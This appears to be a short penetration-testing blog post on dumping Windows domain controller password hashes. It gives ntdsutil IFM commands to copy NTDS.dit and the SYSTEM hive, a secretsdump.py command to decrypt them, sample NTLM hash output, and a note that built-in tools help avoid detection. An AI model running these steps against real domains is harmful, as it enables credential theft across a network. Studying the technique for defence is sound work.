top of page
Sep 52 min read

Obtaining Windows Domain Controller Hashes

Gaining access to Windows Domain Controller password hashes is a critical step for attackers aiming to compromise a Windows network.


Step 1: Obtain NTDS.dit and SYSTEM Registry Hive Data

NTDS.dit is the database that stores Active Directory (AD) data, including password hashes. To extract these hashes, attackers also need the SYSTEM registry hive, which contains the keys necessary to decrypt the NTDS.dit file.


Using ntdsutil.exe

  1. Access ntdsutil.exe: This built-in utility is used to manage AD data, including creating backups.

  2. Activate Instance: Set the active instance to "ntds".

  3. Create Backup: 

C:\Users\Administrator> ntdsutil
ntdsutil: activate instance ntds
Active instance set to "ntds".
ntdsutil: ifm
ifm: create full c:\ntds

This sequence of commands creates a full backup of the AD data in the c:\ntds directory, including the NTDS.dit file and the SYSTEM registry hive.


Step 2: Extracting Password Hashes

After obtaining the NTDS.dit and SYSTEM files, the next step is to decrypt the NTDS.dit data and extract the password hashes.


Using secretsdump.py from Impacket

  1. Install Impacket: Ensure that Impacket is installed on the attacker’s machine.

  2. Run secretsdump.py: This script reads and decrypts the NTDS.dit file using the SYSTEM registry hive. Command for secretsdump.py:

python /usr/share/doc/python-impacket/examples/secretsdump.py -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL

Output will display the decrypted Hashes:


[*]Target system bootKey: 0x7b1c658edfb752594c688e02d4424924
[*] Dumping Domain Credentials (domain\uid: rid: lmhash:nthash) 
[*] Searching for pekList, be patient. 
[*] Pek found and decrypted: 0x1e0d9fa12fb2367f15f22517aa31e84d 
[*] Reading and decrypting hashes from Active Directory/ntds.dit Administrator: 500:aad3b435b51404eeaad3b435b51404ee:9491b24e8c931559455ed4f59476cec2::: Guest: 501:aad3b435b51404eeaad3b435b51404ee:31d2f4f1a07e9fb731e455e0b9a58265::: ksmith: 1000:aad3b435b51404eeaad3b435b51404ee:0d4fa3ed8f51a0d45a7c7fbd0c92b99c:::

Minimizing Detection

Attackers prefer using built-in tools like ntdsutil because they are less likely to trigger security alerts compared to third-party tools. The built-in utilities are designed for system management and backups, thus their usage might not immediately raise suspicion.


Alternative Methods

There are other methods to obtain and extract NTDS.dit and SYSTEM data, such as using volume shadow copies or other administrative tools. Detailed methodologies and advanced techniques can be found in various penetration testing blogs and resources, such as the articles by @netbiosX on PentestLab.


Conclusion

Obtaining and decrypting Windows Domain Controller password hashes involves using built-in utilities to create backups of the necessary files and then employing scripts like secretsdump.py to extract the hashes. Understanding these methods highlights the importance of securing administrative access and monitoring the use of system utilities to prevent unauthorized access to sensitive data.


We will continue this in next post............................................................


Akash Patel

25 views0 comments

Commenti

bottom of page